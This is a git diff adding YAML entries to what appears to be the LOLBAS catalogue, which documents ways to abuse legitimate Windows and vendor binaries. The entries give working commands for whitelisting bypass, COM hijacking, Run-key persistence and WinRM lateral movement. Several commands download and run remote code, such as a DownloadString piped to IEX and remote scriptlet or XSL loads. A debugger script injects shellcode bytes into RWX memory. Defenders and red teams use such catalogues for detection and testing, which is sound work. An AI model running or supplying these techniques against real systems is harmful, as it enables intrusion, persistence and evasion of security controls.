https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url +Detection: [] +Resources: + - https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - https://twitter.com/bohops/status/974043815655956481 + - https://twitter.com/DissectMalware/status/995348436353470465 + - https://twitter.com/yeyint_mth/status/997355558070927360 + - https://twitter.com/Hexacorn/status/974063407321223168 +Notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation) diff --git a/OSLibraries/Zipfldr.yml b/OSLibraries/Zipfldr.yml new file mode 100644 index 0000000..85e6eb9 
--- /dev/null +++ b/OSLibraries/Zipfldr.yml @@ -0,0 +1,20 @@ +--- +Name: Zipfldr.dll +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe + Description: Launch an executable payload by calling RouteTheCall. + - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable payload by calling RouteTheCall. +Full Path: + - c:\windows\system32\zipfldr.dll + - c:\windows\sysWOW64\zipfldr.dll +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/moriarty_meng/status/977848311603380224 + - https://twitter.com/bohops/status/997896811904929792 +Notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation) diff --git a/OSScripts/CL_mutexverifiers.yml b/OSScripts/CL_mutexverifiers.yml new file mode 100644 index 0000000..f8189b7 --- /dev/null +++ b/OSScripts/CL_mutexverifiers.yml @@ -0,0 +1,18 @@ +--- +Name: CL_Mutexverifiers.ps1 +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: ". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1" + Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. +Full Path: + - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 + - C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 + - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/995111125447577600 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate) diff --git a/OSScripts/Cl_invocation.yml b/OSScripts/Cl_invocation.yml new file mode 100644 index 0000000..895c775 --- /dev/null +++ b/OSScripts/Cl_invocation.yml 
@@ -0,0 +1,20 @@ +--- +Name: CL_Invocation.ps1 +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke [args] + Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. +Full Path: + - C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 + - C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 + - C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 +Code Sample: [] +Detection: [] +Resources: + - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ + - https://twitter.com/bohops/status/948548812561436672 + - https://twitter.com/pabraeken/status/995107879345704961 +Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths) diff --git a/OSScripts/Manage-bde.yml b/OSScripts/Manage-bde.yml new file mode 100644 index 0000000..549d882 --- /dev/null +++ b/OSScripts/Manage-bde.yml @@ -0,0 +1,19 @@ +--- +Name: Manage-bde.wsf +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf + Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. + - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf + Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. +Full Path: + - C:\Windows\System32\manage-bde.wsf +Code Sample: [] +Detection: [] +Resources: + - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 + - https://twitter.com/bohops/status/980659399495741441 +Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack) 
diff --git a/OSScripts/Payload/Pubprn_calc.sct b/OSScripts/Payload/Pubprn_calc.sct new file mode 100644 index 0000000..f33fb96 --- /dev/null +++ b/OSScripts/Payload/Pubprn_calc.sct @@ -0,0 +1,22 @@ + + + + + + + + + \ No newline at end of file diff --git a/OSScripts/Payload/Slmgr.reg b/OSScripts/Payload/Slmgr.reg new file mode 100644 index 0000000..3e4874e --- /dev/null +++ b/OSScripts/Payload/Slmgr.reg @@ -0,0 +1,24 @@ +Windows Registry Editor Version 5.00 + +[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary] +@="" + +[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID] +@="{00000001-0000-0000-0000-0000FEEDACDC}" + + +[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] +@="Scripting.Dictionary" + +[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32] +@="C:\\WINDOWS\\system32\\scrobj.dll" +"ThreadingModel"="Apartment" + +[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID] +@="Scripting.Dictionary" + +[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL] +@="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct" + +[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID] +@="Scripting.Dictionary" \ No newline at end of file diff --git a/OSScripts/Payload/Slmgr_calc.sct b/OSScripts/Payload/Slmgr_calc.sct new file mode 100644 index 0000000..0fbc2ef --- /dev/null +++ b/OSScripts/Payload/Slmgr_calc.sct @@ -0,0 +1,22 @@ + + + + + + + + + \ No newline at end of file diff --git a/OSScripts/Pubprn.yml b/OSScripts/Pubprn.yml new file mode 100644 index 0000000..07c4ccb --- /dev/null +++ b/OSScripts/Pubprn.yml 
@@ -0,0 +1,20 @@ +--- +Name: Pubprn.vbs +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct + Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection. +Full Path: + - C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs + - C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs +Code Sample: + - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Pubprn_calc.sct +Detection: [] +Resources: + - https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ + - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + - https://github.com/enigma0x3/windows-operating-system-archaeology +Notes: Thanks to Matt Nelson - @enigma0x3 diff --git a/OSScripts/Slmgr.yml b/OSScripts/Slmgr.yml new file mode 100644 index 0000000..1946236 --- /dev/null +++ b/OSScripts/Slmgr.yml @@ -0,0 +1,20 @@ +--- +Name: Slmgr.vbs +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs + Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. +Full Path: + - c:\windows\system32\slmgr.vbs + - c:\windows\sysWOW64\slmgr.vbs +Code Sample: + - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg + - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct +Detection: [] +Resources: + - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + - https://www.youtube.com/watch?v=3gz1QmiMhss +Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee diff --git a/OSScripts/Syncappvpublishingserver.yml b/OSScripts/Syncappvpublishingserver.yml new file mode 100644 index 0000000..6183c84 --- /dev/null +++ b/OSScripts/Syncappvpublishingserver.yml 
@@ -0,0 +1,17 @@ +--- +Name: SyncAppvPublishingServer.vbs +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" + Description: Inject PowerShell script code with the provided arguments +Full Path: + - C:\Windows\System32\SyncAppvPublishingServer.vbs +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/monoxgas/status/895045566090010624 + - https://twitter.com/subTee/status/855738126882316288 +Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee diff --git a/OSScripts/Winrm.yml b/OSScripts/Winrm.yml new file mode 100644 index 0000000..d4329dd --- /dev/null +++ b/OSScripts/Winrm.yml 
@@ -0,0 +1,28 @@ +--- +Name: Winrm.vbs +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig + Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. + - Command: winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985 + Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol. + - Command: winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985 + Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol. +Full Path: + - C:\windows\system32\winrm.vbs + - C:\windows\SysWOW64\winrm.vbs +Code Sample: + - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg + - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct +Detection: [] +Resources: + - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + - https://www.youtube.com/watch?v=3gz1QmiMhss + - https://github.com/enigma0x3/windows-operating-system-archaeology + - https://redcanary.com/blog/lateral-movement-winrm-wmi/ + - https://twitter.com/bohops/status/994405551751815170 +Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM) + diff --git a/OSScripts/pester.yml b/OSScripts/pester.yml new file mode 100644 index 0000000..640b59f --- /dev/null +++ b/OSScripts/pester.yml 
@@ -0,0 +1,18 @@ +--- +Name: pester.bat +Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Pester.bat [/help|?|-?|/?] "$null; notepad" + Description: Execute notepad +Full Path: + - c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat + - c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/Oddvarmoe/status/993383596244258816 + - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md +Notes: Thanks to Emin Atac - @p0w3rsh3ll diff --git a/OtherBinaries/AcroRd32.yml b/OtherBinaries/AcroRd32.yml new file mode 100644 index 0000000..b1b15bf --- /dev/null +++ b/OtherBinaries/AcroRd32.yml @@ -0,0 +1,16 @@ +--- +Name: AcroRd32.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary + Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe +Full Path: + - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/997997818362155008 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken diff --git a/OtherBinaries/Gpup.yml b/OtherBinaries/Gpup.yml new file mode 100644 index 0000000..a327972 --- /dev/null +++ b/OtherBinaries/Gpup.yml 
@@ -0,0 +1,16 @@ +--- +Name: Gpup.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe + Description: Execute another command through gpup.exe (Notepad++ binary). +Full Path: + - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe ' +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/997892519827558400 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken diff --git a/OtherBinaries/Nlnotes.yml b/OtherBinaries/Nlnotes.yml new file mode 100644 index 0000000..b90b9ce --- /dev/null +++ b/OtherBinaries/Nlnotes.yml @@ -0,0 +1,17 @@ +--- +Name: Nlnotes.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } + Description: Run PowerShell via LotusNotes. +Full Path: + - C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe +Code Sample: [] +Detection: [] +Resources: + - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f + - https://twitter.com/HanseSecure/status/995578436059127808 +Notes: Thanks to Daniel Bohannon - @danielhbohannon diff --git a/OtherBinaries/Notes.yml b/OtherBinaries/Notes.yml new file mode 100644 index 0000000..eaa8577 --- /dev/null +++ b/OtherBinaries/Notes.yml 
@@ -0,0 +1,17 @@ +--- +Name: Notes.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } + Description: Run PowerShell via LotusNotes. +Full Path: + - C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe +Code Sample: [] +Detection: [] +Resources: + - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f + - https://twitter.com/HanseSecure/status/995578436059127808 +Notes: Thanks to Daniel Bohannon - @danielhbohannon diff --git a/OtherBinaries/Nvudisp.yml b/OtherBinaries/Nvudisp.yml new file mode 100644 index 0000000..d4a9cfa --- /dev/null +++ b/OtherBinaries/Nvudisp.yml @@ -0,0 +1,26 @@ +--- +Name: Nvudisp.exe +Description: Execute, Copy, Add registry, Create shortcut, kill process +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Nvudisp.exe System calc.exe + Description: Execute calc.exe as a subprocess. + - Command: Nvudisp.exe Copy test.txt,test-2.txt + Description: Copy fila A to file B. + - Command: Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe + Description: Add/Edit a Registry key value. + - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\" + Description: Create shortcut file. + - Command: Nvudisp.exe KillApp calculator.exe + Description: Kill a process. + - Command: Nvudisp.exe Run foo + Description: ? +Full Path: + - C:\windows\system32\nvuDisp.exe +Code Sample: [] +Detection: [] +Resources: + - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken diff --git a/OtherBinaries/Nvuhda6.yml b/OtherBinaries/Nvuhda6.yml new file mode 100644 index 0000000..1c3b979 --- /dev/null +++ b/OtherBinaries/Nvuhda6.yml 
@@ -0,0 +1,26 @@ +--- +Name: Nvuhda6.exe +Description: Execute, Copy, Add registry, Create shortcut, kill process +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: nvuhda6.exe System calc.exe + Description: Execute calc.exe as a subprocess. + - Command: nvuhda6.exe Copy test.txt,test-2.txt + Description: Copy fila A to file B. + - Command: nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe + Description: Add/Edit a Registry key value + - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\" + Description: Create shortcut file. + - Command: nvuhda6.exe KillApp calc.exe + Description: Kill a process. + - Command: nvuhda6.exe Run foo + Description: ? +Full Path: + - ? +Code Sample: [] +Detection: [] +Resources: + - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/ +Notes: Thanks to Adam - @hexacorn diff --git a/OtherBinaries/ROCCAT_Swarm.yml b/OtherBinaries/ROCCAT_Swarm.yml new file mode 100644 index 0000000..7cf7d0b --- /dev/null +++ b/OtherBinaries/ROCCAT_Swarm.yml @@ -0,0 +1,16 @@ +--- +Name: ROCCAT_Swarm.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe + Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe +Full Path: + - C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\ +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/994213164484001793 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken diff --git a/OtherBinaries/Setup.yml b/OtherBinaries/Setup.yml new file mode 100644 index 0000000..6788570 --- /dev/null +++ b/OtherBinaries/Setup.yml 
@@ -0,0 +1,16 @@ +--- +Name: Setup.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Run Setup.exe + Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload. +Full Path: + - C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315 +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/994381620588236800 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken diff --git a/OtherBinaries/Usbinst.yml b/OtherBinaries/Usbinst.yml new file mode 100644 index 0000000..55e3956 --- /dev/null +++ b/OtherBinaries/Usbinst.yml @@ -0,0 +1,16 @@ +--- +Name: Usbinst.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" + Description: Execute calc.exe through DefaultInstall Section Directive in INF file. +Full Path: + - C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/993514357807108096 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken diff --git a/OtherBinaries/VBoxDrvInst.yml b/OtherBinaries/VBoxDrvInst.yml new file mode 100644 index 0000000..fba2f2c --- /dev/null +++ b/OtherBinaries/VBoxDrvInst.yml @@ -0,0 +1,16 @@ +--- +Name: VBoxDrvInst.exe +Description: Persistence +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf + Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe +Full Path: + - C:\Program Files\Oracle\VirtualBox Guest Additions +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/993497996179492864 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken diff --git a/OtherMSBinaries/Appvlp.yml b/OtherMSBinaries/Appvlp.yml new file mode 100644 index 0000000..1fcc2d4 --- /dev/null 
+++ b/OtherMSBinaries/Appvlp.yml @@ -0,0 +1,22 @@ +--- +Name: Appvlp.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: AppVLP.exe \\webdav\calc.bat + Description: Executes calc.bat through AppVLP.exe + - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" + Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. + - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" + Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. +Full Path: + - C:\Program Files\Microsoft Office\root\client\appvlp.exe + - C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe +Code Sample: [] +Detection: [] +Resources: + - https://github.com/MoooKitty/Code-Execution + - https://twitter.com/moo_hax/status/892388990686347264 +Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution) diff --git a/OtherMSBinaries/Bginfo.yml b/OtherMSBinaries/Bginfo.yml new file mode 100644 index 0000000..8b00538 --- /dev/null +++ b/OtherMSBinaries/Bginfo.yml 
@@ -0,0 +1,20 @@ +--- +Name: Bginfo.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: bginfo.exe bginfo.bgi /popup /nolicprompt + Description: Execute VBscript code that is referenced within the bginfo.bgi file. + - Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt' + Description: Execute bginfo.exe from a WebDAV server. + - Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt' + Description: This style of execution may not longer work due to patch. +Full Path: + - No fixed path +Code Sample: [] +Detection: [] +Resources: + - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ +Notes: Thanks to Oddvar Moe - @oddvarmoe diff --git a/OtherMSBinaries/Cdb.yml b/OtherMSBinaries/Cdb.yml new file mode 100644 index 0000000..7bde634 --- /dev/null +++ b/OtherMSBinaries/Cdb.yml @@ -0,0 +1,19 @@ +--- +Name: Cdb.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: cdb.exe -cf x64_calc.wds -o notepad.exe + Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. +Full Path: + - C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe + - C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe +Code Sample: [] +Detection: [] +Resources: + - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html + - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options + - https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda +Notes: Thanks to Matt Graeber - @mattifestation diff --git a/OtherMSBinaries/Csi.yml b/OtherMSBinaries/Csi.yml new file mode 100644 index 0000000..4f77e96 --- /dev/null +++ b/OtherMSBinaries/Csi.yml 
@@ -0,0 +1,18 @@ +--- +Name: csi.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: csi.exe file + Description: Use csi.exe to run unsigned C# code. +Full Path: + - c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe + - c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/subTee/status/781208810723549188 + - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ +Notes: Thanks to Casey Smith - @subtee diff --git a/OtherMSBinaries/Dnx.yml b/OtherMSBinaries/Dnx.yml new file mode 100644 index 0000000..9887d6e --- /dev/null +++ b/OtherMSBinaries/Dnx.yml @@ -0,0 +1,17 @@ +--- +Name: dnx.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: dnx.exe consoleapp + Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) +Full Path: + - N/A +Code Sample: [] +Detection: [] +Resources: + - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ +Notes: Thanks to Matt Nelson - @enigma0x3 + diff --git a/OtherMSBinaries/Dxcap.yml b/OtherMSBinaries/Dxcap.yml new file mode 100644 index 0000000..2eded97 --- /dev/null +++ b/OtherMSBinaries/Dxcap.yml @@ -0,0 +1,17 @@ +--- +Name: Dxcap.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe + Description: Launch notepad as a subprocess of Dxcap.exe +Full Path: + - c:\Windows\System32\dxcap.exe + - c:\Windows\SysWOW64\dxcap.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/harr0ey/status/992008180904419328 +Notes: Thanks to Matt harr0ey - @harr0ey 
diff --git a/OtherMSBinaries/Mftrace.yml b/OtherMSBinaries/Mftrace.yml new file mode 100644 index 0000000..9834d5c --- /dev/null +++ b/OtherMSBinaries/Mftrace.yml @@ -0,0 +1,21 @@ +--- +Name: Mftrace.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Mftrace.exe cmd.exe + Description: Launch cmd.exe as a subprocess of Mftrace.exe. + - Command: Mftrace.exe powershell.exe + Description: Launch cmd.exe as a subprocess of Mftrace.exe. +Full Path: + - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 + - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64 + - C:\Program Files (x86)\Windows Kits\10\bin\x86 + - C:\Program Files (x86)\Windows Kits\10\bin\x64 +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible) +Notes: Thanks to fabrizio - @0rbz_ diff --git a/OtherMSBinaries/Msdeploy.yml b/OtherMSBinaries/Msdeploy.yml new file mode 100644 index 0000000..5d07ebd --- /dev/null +++ b/OtherMSBinaries/Msdeploy.yml @@ -0,0 +1,16 @@ +--- +Name: Msdeploy.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" + Description: Launch calc.bat via msdeploy.exe. +Full Path: + - C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/995837734379032576 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken diff --git a/OtherMSBinaries/Msxsl.yml b/OtherMSBinaries/Msxsl.yml new file mode 100644 index 0000000..2bed376 --- /dev/null +++ b/OtherMSBinaries/Msxsl.yml 
@@ -0,0 +1,19 @@ +--- +Name: msxsl.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: msxsl.exe customers.xml script.xsl + Description: Run COM Scriptlet code within the script.xsl file (local). + - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml + Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). +Full Path: + - N/A +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/subTee/status/877616321747271680 + - https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker +Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote) diff --git a/OtherMSBinaries/Payload/Cdb_calc.wds b/OtherMSBinaries/Payload/Cdb_calc.wds new file mode 100644 index 0000000..4073bb5 --- /dev/null +++ b/OtherMSBinaries/Payload/Cdb_calc.wds 
@@ -0,0 +1,93 @@ +$$ Save this to a file - e.g. x64_calc.wds +$$ Example: launch this shellcode in a host notepad.exe process. +$$ cdb.exe -cf x64_calc.wds -o notepad.exe + +$$ Allocate 272 bytes for the shellcode buffer +$$ Save the address of the resulting RWX in the pseudo $t0 register +.foreach /pS 5 ( register { .dvalloc 272 } ) { r @$t0 = register } + +$$ Copy each individual shellcode byte to the allocated RWX buffer +$$ Note: The `eq` command could be used to save space, if desired. +$$ Note: .readmem can be used to read a shellcode buffer too but +$$ shellcode on disk will be subject to AV scanning. +;eb @$t0+00 FC;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 E4 +;eb @$t0+04 F0;eb @$t0+05 E8;eb @$t0+06 C0;eb @$t0+07 00 +;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51 +;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51 +;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 D2 +;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8B;eb @$t0+17 52 +;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8B;eb @$t0+1B 52 +;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8B;eb @$t0+1F 52 +;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8B;eb @$t0+23 72 +;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0F;eb @$t0+27 B7 +;eb @$t0+28 4A;eb @$t0+29 4A;eb @$t0+2A 4D;eb 